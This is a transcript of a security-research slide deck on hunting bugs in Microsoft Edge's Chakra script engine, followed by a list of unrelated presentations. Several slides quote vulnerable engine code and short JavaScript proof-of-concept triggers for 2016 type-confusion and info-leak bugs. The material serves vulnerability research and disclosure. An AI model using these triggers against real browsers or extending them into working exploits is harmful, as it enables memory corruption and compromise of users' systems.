your chakra is not aligned
play

Your Chakra Is Not Aligned Hunting bugs in the Microsoft Edge Script - PowerPoint PPT Presentation

Oct 06, 2023 •486 likes •893 views

Your Chakra Is Not Aligned Hunting bugs in the Microsoft Edge Script Engine About Me Natalie Silvanovich AKA natashenka Project Zero member Previously did mobile security on Android and BlackBerry ECMAScript enthusiast

  1. Your Chakra Is Not Aligned Hunting bugs in the Microsoft Edge Script Engine

  2. About Me Natalie Silvanovich AKA natashenka ● Project Zero member ● ● Previously did mobile security on Android and BlackBerry ECMAScript enthusiast ●

  3. What are Edge and Chakra ● Edge: Windows 10 browser ● Chakra: Edge’s open-source ECMAScript core ○ Regularly updated ○ Accepts external contributions

  4. What is ECMAScript ● ECMAScript == Javascript (mostly) ● Javascript engines implement the ECMAScript standard ● ES7 released in June

  5. Why newness matters ● Standards don’t specify implementation ● Design decisions are untested ○ Security and performance advantages (and disadvantages) ● Developers and hackers learn from new bugs ● Attacks mature over time ● High contention space

  6. Goals ● Find bugs in Chakra ● Understand and improve weak areas Find deep, unusual bugs* ●

  7. Approach ● Code review ○ Finds quality bugs ○ Bugs live longer* ○ Easier to fix an entire class of bugs

  8. RTFS ● Reading the standard is important ○ Mozilla docs (MDN) is a great start ● Many features are used infrequently but cause bugs ● Features are deeply intertwined

  9. Array.species “But what if I subclass an array and slice it, and I want the thing I get back to be a regular Array and not the subclass?” class MyArray extends Array { static get [Symbol.species]() { return Array;} } ● Easily implemented by inserting a call to script into *every single* Array native call

  10. Array Conversion ● Arrays can be complicated but most Arrays are simple Most implementations have simple arrays with more complex fallbacks ○ Add a float IntegerArray FloatArray Add a non-numeric value Configure a value (e.g read-only) VarArray ES5Array

  11. Array Conversion ● Integer, Float and ES5 arrays are subclasses of Var Array superclass ● vtable swapping (for real)

  12. Array Conversion IntSegment IntArray length vtable size length left head next ... element[0] ...

  13. Array Conversion IntSegment IntArray length vtable<FloatArray> size length left head next ... element[0] ...

  14. Array Conversion FloatSegment IntArray length vtable<FloatArray> size length left head next ... element[0] ...

  15. Array Format ● No concept of sparseness ○ A dense array is just a sparse array with one segment ○ Arrays only become property arrays in exceptional situations (a property on an index)

  16. CVE-2016-7200 (Array.filter) ● Type confusion / overflow due to Array species ● Same issue occurs in Array.Map ( CVE-2016-7190)

  17. CVE-2016-7200 (Array.filter) RecyclableObject * newObj = ArraySpeciesCreate ( obj , 0 , scriptContext ); ... newArr = JavascriptArray :: FromVar ( newObj ); … if (! pArr -> DirectGetItemAtFull ( k , & element )) ... selected = CALL_ENTRYPOINT ( callBackFn -> GetEntryPoint (), callBackFn , CallInfo ( CallFlags_Value , 4 ), thisArg , element , JavascriptNumber :: ToVar ( k , scriptContext ), pArr ); if ( JavascriptConversion :: ToBoolean ( selected , scriptContext )) { // Try to fast path if the return object is an array if ( newArr ) { newArr -> DirectSetItemAt ( i , element );

  18. CVE-2016-7200 class dummy{ constructor(){ return [1, 2, 3]; } } class MyArray extends Array { static get [Symbol.species]() { return dummy; } } var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7); function test(i){ return true; } a.__proto__ = MyArray.prototype; var o = a.filter(test);

  19. Array Index Interceptors ● Object.defineProperty can add getters, setters and properties to almost anything ● Can also be applied to prototypes ● Gives you handles to the object

  20. var a = [1, 2, 3]; function f(){ print(“in f”) } Object.defineProperty(a, “0”, {get : f, set : f}); a[0]; // prints f a[0] = 1; // prints f

  21. Array.prototype Object.prototype __proto__ Array Object __proto__ length (getter/setter) __proto__ __defineGetter__ slice 0 toString ... 1 ... ...

  22. function f(){ print(“in f”);} Object.defineProperty(Array.prototype, “0”, {get : f, set : f}); var a = []; var b = [1]; a[0]; // prints f a[0] = 1; // prints f b[0]; // no print b[0] = 1; //no print

  23. CVE-2016-7189 ● Info leak in Array.join due to Array index interceptor

  24. CVE-2016-7189 JavascriptString * JavascriptArray :: JoinArrayHelper ( T * arr , JavascriptString * separator , ScriptContext * scriptContext ) { ... for ( uint32 i = 1 ; i < arrLength ; i ++) { if ( hasSeparator ) { cs -> Append ( separator ); } if ( TryTemplatedGetItem ( arr , i , & item , scriptContext ))

  25. CVE-2016-7189 var t = new Array(1,2,3); t.length = 100; Object.defineProperty(Array.prototype, '3', { get: function() { t[0] = {}; for(var i = 0; i < 100; i++){ t[i] = {a : i}; } return 7; } }); var s = [].join.call(t);

  26. Proxy “But what if I want to debug Javascript in Javascript?” var handler = { get: function(target, name){ return name in target? target[name] : 37; } }; var p = new Proxy({}, handler);

  27. CVE-2016-7201 ● Type confusion due to unexpected proxy behaviour ○ Proxy can return any prototype ○ Chakra performs checks when setting prototype ○ Forces arrays to var arrays

  28. CVE-2016-7201 void JavascriptArray::InternalFillFromPrototype(JavascriptArray *dstArray, const T& dstIndex, JavascriptArray *srcArray, uint32 start, uint32 end, uint32 count) { RecyclableObject* prototype = srcArray->GetPrototype(); while (start + count != end && JavascriptOperators::GetTypeId(prototype) != TypeIds_Null) { ForEachOwnMissingArrayIndexOfObject(srcArray, dstArray, prototype, start, end, dstIndex, [&](uint32 index, Var value) { T n = dstIndex + (index - start); dstArray->DirectSetItemAt(n, value); count++; }); prototype = prototype->GetPrototype(); } }

  29. CVE-2016-7201 var a = new Array(0x11111111, 0x22222222, 0x33333333, ... var handler = { getPrototypeOf: function(target, name){ return a; } }; var p = new Proxy([], handler); var b = [{}, [], "natalie"]; b.__proto__ = p; b.length = 4; a.shift.call(b); // b[2] is type confused

  30. newTarget ● newTarget is a constructor parameter that provides the prototype ○ Not frequently used* ○ Passed as a hidden last parameter to call if set

  31. CVE-2016-7240 if ( args . Info . Flags & CallFlags_ExtraArg) { // This was recognized as an eval call at compile time. The last one or two args are internal to us. // Argcount will be one of the following when called from global code // - eval("...") : argcount 3 : this, evalString, frameDisplay // - eval.call("..."): argcount 2 : this(which is string) , frameDisplay if ( args . Info . Count >= 2 ) { environment = ( FrameDisplay *)( args [ args . Info . Count - 1 ]); … CallInfo calleeInfo (( CallFlags )( args . Info . Flags | CallFlags_ExtraArg | CallFlags_NewTarget), newCount ); for ( uint argCount = 0 ; argCount < args . Info . Count ; argCount ++) { newValues [ argCount ] = args . Values [ argCount ]; }

  32. CVE-2016-7240 var p = new Proxy(eval, {}); p("alert(\"e\")");

  33. Untested Code ● The code in CVE-2016-7240 should function according to ES5

  34. Simple Error ● It happens!

  35. Bug 961 Var * newArgs = HeapNewArray ( Var , numArgs ); switch ( numArgs ) { case 1 : break; case 2 : newArgs [ 1 ] = args [ 1 ]; break; case 3 : newArgs [ 1 ] = args [ 1 ]; newArgs [ 2 ] = args [ 2 ]; break; default: Assert ( UNREACHED ); }

  36. Bug 961 var v = SIMD.Int32x4(1, 2, 3, 4); v.toLocaleString(1, 2, 3, 4)

  37. Conclusions ● ES implementation choices lead to bugs ○ You never get it right the first time ● Focus on under-used features and execution points

  38. Conclusions ● Join the party!

  39. Questions http://googleprojectzero.blogspot.com/ @natashenka natalie@natashenka.ca

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Chakra, a user friendly distribution using the KDE desktop Laszlo Papp 04.07.2010 | T ampere |

Chakra, a user friendly distribution using the KDE desktop Laszlo Papp 04.07.2010 | T ampere |

Chakra, a user friendly distribution using the KDE desktop Laszlo Papp 04.07.2010 | T ampere | Akademy Agenda Introduction KDEmod Half-rolling release model Live CD development T ool development Community Questions

572 views • 35 slides
Angel alchemy session 2 Bubble clearing, the 4 clairs, the root and sacral chakra What is Angel

Angel alchemy session 2 Bubble clearing, the 4 clairs, the root and sacral chakra What is Angel

Angel alchemy session 2 Bubble clearing, the 4 clairs, the root and sacral chakra What is Angel Alchemy? The art and science of invoking Source and Angelic Energy to produce DRAMATIC and RAPID healing in the deepest aspects of our hearts,

404 views • 17 slides
A tale of Chakra bugs through the years Bruno Keith (@bkth_) SSTIC 2019 whoami 24, Independent

A tale of Chakra bugs through the years Bruno Keith (@bkth_) SSTIC 2019 whoami 24, Independent

A tale of Chakra bugs through the years Bruno Keith (@bkth_) SSTIC 2019 whoami 24, Independent Researcher, Navigating the jungle of French entrepreneurship CTF player since 2016 (ESPR), now retired due to ptmalloc2 PTSD Vuln research since

889 views • 85 slides
Simulation of Field-Aligned Simulation of Field-Aligned Ideal MHD Flows Around deal MHD Flows

Simulation of Field-Aligned Simulation of Field-Aligned Ideal MHD Flows Around deal MHD Flows

11 th INTERNATIONAL CONFERENCE ON HYPERBOLIC PROBLEMS: THEORY, NUMERICS, APPLICATIONS Simulation of Field-Aligned Simulation of Field-Aligned Ideal MHD Flows Around deal MHD Flows Around Perfectly Conducting Cylinders Using An Artificial

543 views • 37 slides
CHAKRA: UNDER THE HOOD Steve Lucco Technical Fellow Microsoft Design Principles Security

CHAKRA: UNDER THE HOOD Steve Lucco Technical Fellow Microsoft Design Principles Security

CHAKRA: UNDER THE HOOD Steve Lucco Technical Fellow Microsoft Design Principles Security ECMAScript Compliance Balanced Performance Transparency JIT Security int 3 int 3 push ebp mov ebp, esp Data Execution Protection

734 views • 26 slides
ChakraLinux.org ChakraLinux.org The Half Rolling repository model The golden intersection for

ChakraLinux.org ChakraLinux.org The Half Rolling repository model The golden intersection for

ChakraLinux.org ChakraLinux.org The Half Rolling repository model The golden intersection for desktop users? About Chakra About Chakra Focus on KDE and Qt Software Independent , using Arch technologies Half-Rolling repository model

286 views • 26 slides
Byte-Aligned Codes Indexing, session 6 CS6200: Information Retrieval Slides by: Jesse Anderton

Byte-Aligned Codes Indexing, session 6 CS6200: Information Retrieval Slides by: Jesse Anderton

Byte-Aligned Codes Indexing, session 6 CS6200: Information Retrieval Slides by: Jesse Anderton Byte-Aligned Codes Weve looked at ways to encode integers with bit-aligned codes. These are very compact, but somewhat inconvenient. Processors

300 views • 7 slides
Adversarial Robustness for Aligned AI Ian Goodfellow, Sta ff Research NIPS 2017 Workshop on

Adversarial Robustness for Aligned AI Ian Goodfellow, Sta ff Research NIPS 2017 Workshop on

Adversarial Robustness for Aligned AI Ian Goodfellow, Sta ff Research NIPS 2017 Workshop on Aligned Artificial Intelligence Many thanks to Catherine Olsson for feedback on drafts The Alignment Problem (This is now fixed. Dont try it!)

626 views • 30 slides
Overview Aligned / Combined Aligned (Virtual) Airfare and Combined Ontology Car Rental

Overview Aligned / Combined Aligned (Virtual) Airfare and Combined Ontology Car Rental

C ONTEXTUAL A LIGNMENT OF O NTOLOGIES F OR S EMANTIC I NTEROPERABILITY Stuart Madnick, Benjamin Grosof Aykut Firat Massachusetts Institute of Northeastern Technology University Workshop on Information Technologies And Systems (WITS'04)

449 views • 20 slides
Republic of Nauru Planning &amp; Monitoring Frameworks for National, Sectoral and aligned

Republic of Nauru Planning &amp; Monitoring Frameworks for National, Sectoral and aligned

Republic of Nauru Planning &amp; Monitoring Frameworks for National, Sectoral and aligned Development Plans ILLUSTRATIVE DRAFT Overview The National plan and aligned plans M&amp;E frameworks and respective Indicators Reporting

1.34k views • 19 slides
Collecting Aligned Textual Corpora from the Hidden Web Botjan Pajntar bostjan.pajntar@ijs.si

Collecting Aligned Textual Corpora from the Hidden Web Botjan Pajntar bostjan.pajntar@ijs.si

Collecting Aligned Textual Corpora from the Hidden Web Botjan Pajntar bostjan.pajntar@ijs.si ailab.ijs.si Aligned Parallel Corpus Definition (wikipedia): A parallel text is a text placed alongside its translation or translations

424 views • 7 slides
Network-Aligned content delivery through collaborative optimization Dr.-Ing. Ingmar Poese

Network-Aligned content delivery through collaborative optimization Dr.-Ing. Ingmar Poese

Titlepage Network-Aligned content delivery through collaborative optimization Dr.-Ing. Ingmar Poese ipoese@benocs.com BENOCS GmbH Reuchlinstrasse 10 10553 Berlin, Germany May 17 th 2018 Poese (BENOCS) Network-Aligned content delivery

650 views • 24 slides
MPA (Marker PDU Aligned Framing for TCP) draft-culley-iwarp-mpa-01 Paul R . Culley HP

MPA (Marker PDU Aligned Framing for TCP) draft-culley-iwarp-mpa-01 Paul R . Culley HP

MPA (Marker PDU Aligned Framing for TCP) draft-culley-iwarp-mpa-01 Paul R . Culley HP 11-18-2002 11/18/2002 MPA Marker (Protocol Data Unit) Aligned Framing, or MPA. 1 Motivation for MP A/ DDP Enable Direct Data P lacement

473 views • 7 slides
ELECTRICAL AND MECHANICAL PROPERTIES OF POLYURETHANE NANOCOMPOSITES CONTAINING SELF- ALIGNED

ELECTRICAL AND MECHANICAL PROPERTIES OF POLYURETHANE NANOCOMPOSITES CONTAINING SELF- ALIGNED

18 TH INTERNATIONAL CONFERENCE ON COMPOSITE MATERIALS ELECTRICAL AND MECHANICAL PROPERTIES OF POLYURETHANE NANOCOMPOSITES CONTAINING SELF- ALIGNED GRAPHENE SHEETS M. M. GUDARZI, S. H. ABOUTALEBI, Q. B. ZHENG and J.-K. KIM* Department of

608 views • 5 slides
Induction of Treebank-Aligned Lexical Resources LREC 2008 Tejaswini Deoskar, Mats Rooth

Induction of Treebank-Aligned Lexical Resources LREC 2008 Tejaswini Deoskar, Mats Rooth

Induction of Treebank-Aligned Lexical Resources LREC 2008 Tejaswini Deoskar, Mats Rooth Department of Linguistics Cornell University Induction of Treebank-Aligned Lexical Resources p. 1/2 Overview Goal: Induction of probabilistic

672 views • 54 slides
Raising the Bar Five Opportunities for Growth Recruitment Initiatives Aligned to District

Raising the Bar Five Opportunities for Growth Recruitment Initiatives Aligned to District

Raising the Bar Five Opportunities for Growth Recruitment Initiatives Aligned to District Strategic Plan Build Instructional GOAL 2: Increase achievement for each and every Capacity student by ensuring access to rigorous programs, addressing

784 views • 40 slides
Structures, Strings, and Such What about arrays? Arrays are declared: 0 arr[0] int arr[8];

Structures, Strings, and Such What about arrays? Arrays are declared: 0 arr[0] int arr[8];

Structures, Strings, and Such What about arrays? Arrays are declared: 0 arr[0] int arr[8]; 0 arr[1] This declares an array of 8 0 arr[2] integers 0 arr[3] Memory allocated for it, but 5 0 arr[4] not initialized 0 arr[5]

149 views • 4 slides
JVM Optimization 101 Sebastian Zarnekow itemis Static vs Dynamic Compilation AOT vs JIT JIT

JVM Optimization 101 Sebastian Zarnekow itemis Static vs Dynamic Compilation AOT vs JIT JIT

JVM Optimization 101 Sebastian Zarnekow itemis Static vs Dynamic Compilation AOT vs JIT JIT Compilation Compiled when needed Maybe immediately before execution ...or when the VM decides its important ...or never? JIT Compilation

757 views • 28 slides
Todays lecture Continue exploring C-strings Under the hood: sequence of chars w/ terminating

Todays lecture Continue exploring C-strings Under the hood: sequence of chars w/ terminating

Todays lecture Continue exploring C-strings Under the hood: sequence of chars w/ terminating null Review implementation of strcpy, strncpy As abstraction: client of string.h functions Write pig latin conversion program Pointer mechanics

489 views • 10 slides
Arrays Arrays can be defined/initialized using arr=(1 2 3) Elements can be set using square

Arrays Arrays can be defined/initialized using arr=(1 2 3) Elements can be set using square

Arrays Arrays can be defined/initialized using arr=(1 2 3) Elements can be set using square bracket notation, e.g. arr[0]=$x, and can use variables for indices, e.g arr[$i]=$x Look up elements using syntax ${arr[$i]} To get the size

317 views • 3 slides
Multidimensional Arrays CS 201 This slide set covers pointers and arrays in C++. You should read

Multidimensional Arrays CS 201 This slide set covers pointers and arrays in C++. You should read

Multidimensional Arrays CS 201 This slide set covers pointers and arrays in C++. You should read Chapter 8 from your Deitel &amp; Deitel book. Multidimensional arrays void foo() { // These are the necessary // declarations to represent

502 views • 11 slides
CSE443 Compilers Dr. Carl Alphonce alphonce@buffalo.edu 343 Davis Hall http:/

CSE443 Compilers Dr. Carl Alphonce alphonce@buffalo.edu 343 Davis Hall http:/

CSE443 Compilers Dr. Carl Alphonce alphonce@buffalo.edu 343 Davis Hall http:/ /www.cse.buffalo.edu/faculty/alphonce/SP17 /CSE443/index.php https:/ /piazza.com/class/iybn4ndqa1s3ei WW @ 4/5 handling of type checking in: 'assignable

519 views • 17 slides
Compiler Verification meets Cross-Language Linking via Data Abstraction Peng Wang,

Compiler Verification meets Cross-Language Linking via Data Abstraction Peng Wang,

Compiler Verification meets Cross-Language Linking via Data Abstraction Peng Wang, MIT CSAIL Santiago Cuellar, Princeton University Adam Chlipala, MIT CSAIL Verified Compiler Program Verification Techniques

706 views • 35 slides
Lists, Stacks and Queues The List ADT List ADT n A list is a dynamic ordered tuple of

Lists, Stacks and Queues The List ADT List ADT n A list is a dynamic ordered tuple of

Lists, Stacks and Queues The List ADT List ADT n A list is a dynamic ordered tuple of homogeneous elements A o , A 1 , A 2 , , A N-1 where A i is the i-th element of the list n The position of element A i is i; positions range from 0

437 views • 31 slides

More recommend